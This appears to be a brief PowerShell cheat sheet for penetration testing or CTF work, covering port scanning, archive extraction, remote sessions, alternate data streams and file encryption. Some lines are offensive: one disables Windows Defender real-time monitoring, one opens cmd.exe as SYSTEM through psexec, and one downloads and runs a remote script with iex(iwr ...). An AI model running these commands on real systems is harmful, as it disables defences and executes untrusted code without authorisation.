Compact loop:

1,2,3,4 | % {write-host $_}

Scan selected ports:

22,53,80,443,445 | % { Test-Connection -ComputerName <ip> -Port $_ }


Expand-Archive <>
Add-Type -assembly 'system.io.compression.filesystem';[io.compression.zipfile]::ExtractToDirectory("<archive path>","<target dir>")

Check for hidden streams:

Get-Item -Stream * <path>

Disable Windows Defender:

powershell.exe -exec bypass -command Set-MpPreference -DisableRealtimeMonitoring $true

Check for Constrained Language Mode:


Inject .ps1 into session:

Invoke-Command -FilePath <script> -Sessions $sessions
Enter-PSSession -Session $sess

Run cmd.exe as SYSTEM:

psexec.exe -i -s %SystemRoot%\system32\cmd.exe

File Transfer & Execution

iex(iwr http://<ip>/x.ps1 -usebasicparsing)

Prevent Output Truncation

| Ft -autosize -wrap
| fl

Encrypt files

# https://gallery.technet.microsoft.com/scriptcenter/EncryptDecrypt-files-use-65e7ae5d
$key = New-CryptographyKey -Algorithm AES
# Encrypt the file
Protect-File '.\secrets.txt' -Algorithm AES -Key $key -RemoveSource
# Decrypt the file
Unprotect-File '.\secrets.txt.AES' -Algorithm AES -Key $key -RemoveSource

Alternate Data Stream (ADS)

powershell -command "get-item <file> -stream *"
powershell -command "get-content <file> -stream root.txt"